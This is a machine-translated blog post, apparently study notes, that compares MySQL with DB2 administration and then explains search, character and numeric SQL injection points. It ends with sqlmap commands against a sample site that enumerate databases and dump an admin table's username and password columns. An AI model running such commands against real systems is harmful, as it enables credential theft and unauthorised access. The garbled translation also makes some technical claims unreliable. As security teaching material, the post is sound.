Article From:https://www.cnblogs.com/genius-sen/p/9064579.html

study the principle of buffer overflow, at least for two kinds of databases.”

MYSQLCompare with DB2

  • Account management mode
    MySQLThe way of account management is similar to Oracle, managed by MySQL, and the account is stored in the user table of the MySQL database. The account is composed of IP address + user name, and DB2 has no own user system, and its authentication is entirely dependent on the account of the operating system.

  • Authority management mode
    MySQLThe right management method is the same as the way of DB2 authority management. It can authorize individual objects and achieve fine granularity authorization. The difference is that MySQL is better at account security. Its account is made up of user names plus IP addresses, that is, its authentication needs.At the same time, verify the legality of user login IP and user name, while DB2 only authenticate the linked account. Another advantage of MySQL is that the object of the smallest unit can be authorized in batch, and DB2 is not, relatively cumbersome, which is one of the places where DB2 needs to be improved.

  • Log management
    MySQLThe database uses log double write to ensure the integrity and recoverability of the data, and there is no causal relationship between the transaction log of MySQL and the two independent objects of the archived log. The archiving log of DB2 database is generated by transaction log. So the performance of the MySQL database on the UDI operationIt’s a little worse than DB2.

  • Management mode of lock
    MySQLThe MVCC model is used to realize the concurrency control of the lock. The DB2 uses the memory model to realize the concurrency control of the lock. The concurrency processing ability of MySQL is described in the concurrent processing and processing resource conflicts, and the lock conflict is better than the DB2.

  • schemaManagement mode
    MySQLIn the strict sense of database, there is no concept of schema, and each schema is equivalent to an independent database. DB2 database can create more than one schema in one database. This is also the deficiency of MySQL in schema and the need for improvement.

  • Management mode of table space
    MySQLThe database only has the concept of tablespace after 5.6, but its way of using tablespace differs greatly from that of enterprise database. MySQL database is relatively weak in tablespace, and there are many limitations. There are weaknesses in the management of strip space and space. DB2 is doing these thingsThey are very perfect, and are very strong and easy to maintain. These are the places where MySQL needs to learn from enterprise databases.

  • The way of dealing with the behavior of things
    MySQLThe database acquiescence is only the state of the back of a statement when dealing with transaction related operations, and the whole transaction is not actually completed (submission or rollback), but the choice is to submit or roll back the entire transaction by the application when the error is detected. The way the DB2 database handles transactions is when DB2 databases roll back the entire transaction after a lock timeout or other problems cause an exception, instead of rolling back to the last save point, which is a place to pay special attention to.

This is a special type of injection. This kind of injection mainly refers to the failure to filter the search parameters when searching for data. Generally, there are “keyword= keywords” in the link address, and some unlinked addresses are not displayed, but are submitted directly through the search box form.
The SQL statements submitted by such injection points are roughly the same as:select * from Table name where field like '% key%'
When we submit the injection parameter,keyword='and[Query condition] and '%' = ',The SQL statement submitted to the database is:
select * from Table name where field like '%' and [query condition] and '%' = '%'

character injection point

The injection parameters such as http://****? Class= date are “characters”, so they are called character injection points.

The SQL statements submitted by such injection points are roughly the same as:select * from Table name where field = 'date'

When we submit the injection parameter to http://****Class= date And[query condition, the complete SQL statement submitted to the database is:select * from Table name where field = 'date' and [query condition]

digital injection point”

Like http://****? ID=55, this kind of injection parameter is “digital”, so it is called “digital injection point”.

The SQL statements submitted by such injection points are roughly the same as:select * from Table name where field =55

When we submit the injection parameter to http://****? ID=55 And[query condition, the complete SQL statement submitted to the database is:select * from Table name where field =55 And [query condition]

sqlmap

sqlmap”

sqlmapSupport five different injection modes:

  • Based on Boolean blind injection, we can determine the true and false injection according to the return page.
  • A time – based blind note can not judge any information according to the content of the page, and to judge whether the time delay statement is executed with a conditional statement (or whether the return time of the page is increased).
  • Based on error injection, that is, the page will return the error information, or the result of the injected statement will be returned directly to the page.
  • Combined query injection can be injected in the case of union.
  • Heap query injection can execute injection of multiple statements at the same time.

sqlmap part command

sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs

What databases are there to query

sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables

Query the tables in the test database

sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –columns

What fields are there in the admin table in the test database

sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C “username,password” –dump

dumpOut of field username and data in password

SQL Power Injector

Similar Posts:

Leave a Reply

Your email address will not be published. Required fields are marked *